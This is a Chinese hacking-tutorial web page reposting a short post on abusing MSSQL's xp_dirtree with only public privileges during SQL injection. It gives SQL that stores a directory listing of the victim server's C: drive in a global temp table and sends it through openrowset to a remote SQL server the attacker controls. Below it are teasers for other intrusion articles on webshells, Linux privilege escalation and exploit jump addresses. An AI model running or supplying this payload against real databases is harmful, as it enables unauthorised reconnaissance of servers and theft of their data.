MSSQL注入PUBLIC权限下的xp_dirtree再度利用方法
所属分类:
实用技巧 / 安全教程
阅读数:
1002
收藏 0赞 0分享
软件作者:kj021320
信息来源:I.S.T.O技术团队(http://blog.csdn.net/I_S_T_O/)
本来这文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...
正文:
提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧
--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
create table ##nonamed(
dir ntext,
num int
)
--调用存储过程把执行回来的数据存到临时表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964
非常不错的脚本入侵基础知识总结第1/2页
简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0赞 0分享
linux提权用的一个技巧
一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0赞 0分享
一些通用跳转地址,XXOXX的时候有点用
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
收藏 0赞 0分享
入侵过程中用过的三大门派的几个小工具[推荐]
vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
收藏 0赞 0分享
查看更多